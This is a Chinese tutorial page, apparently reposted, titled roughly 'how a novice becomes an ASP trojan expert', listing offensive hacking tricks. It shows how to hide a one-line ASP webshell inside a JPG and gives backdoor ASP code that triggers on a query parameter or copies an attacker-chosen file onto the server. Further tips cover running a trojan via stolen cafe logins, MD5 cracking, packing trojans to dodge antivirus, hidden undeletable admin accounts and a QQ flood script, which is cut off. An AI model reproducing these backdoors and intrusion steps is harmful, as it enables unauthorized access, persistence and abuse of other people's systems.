欢迎来到福编程网,本站提供各种互联网专业知识!

菜鸟是如何变成ASP木马高手的!

发布时间:2016-08-29 作者:佚名 来源:互联网
1.名称:如何制作图片ASP木马建一个asp文件,内容为<!--#includefile="ating.jpg"-->找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为了运行成功,还要搜索<%和%>,将

1.名称:如何制作图片ASP木马

建一个asp文件,内容为

找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入

2. 名称:整蛊网吧

先用精锐网吧辅助工具得到用户名和密码,然后用计算机管理联结一台机器,开telnet,连接,开共享,

复制一个木马过去运行即可。

3.名称:感受MD5暴力破解的魅力

rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all"

1和7代表密码最小和最大长度

阿汀我再加个方法:http://md5.rednoize.com/ 在线破解

或者到http://www.md5lookup.com/?category=01-3&searck=on

4.很多时候我们做免杀木马,不用懂汇编,用北斗加壳程序就能逃杀,还有很多加壳软件,大家木马加壳的时候最好多选择不知名的加壳软件

5.名称:隐蔽的插入型ASP木马

(1)在我们要做手脚的asp文件里加入如下内容

<%if request("action")="ok" then%>

shell代码插在这里,最好是小马,还要加密一下

<%end if%>

访问的时候在你作手脚的asp文件后面加上?action=ok,即可

(2)另一种方法,在我们要做手脚的asp文件里加入如下内容

<%

on error resume next

strFileName = Request.QueryString("filer")

set objStream = Server.createObject("ABODB.Stream")

objStream.Type = 1

objStream.Open

objStream.LoadFromFile strFileName

objStream.SaveToFile Server.mappath("ating.asp"),2

%>

访问的时候在做手脚的asp文件后面加上?filer=XXX

XXX为你本地上传的一个路径如 c:ating123.asp

上传后在做手脚的asp的同文件夹中有ating,asp

(3)前提得到system权限,

进入网站目录下一层

mkdir s…

copy ating.asp s…/

这样杀毒软件找不到的

访问http://网站/s…/ating.asp即可

6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar,此工具在该电脑生成一个超级用户

用户名为:hack 密码110,在DOS下和计算机管理器上看不到你建立的用户,并且是删除不掉的.

7.名称:QQ群脚本攻击

打开qq对话诓,复制消息,然后

下面的内容保存为.vbs 文件,运行即可

Set WshShell= WScript.createobject("WScript.Shell")

WshShell.AppActivate "QQ信息攻击脚本"

for i=1 to 20

上一页12 3 4 下一页 阅读全文

相关推荐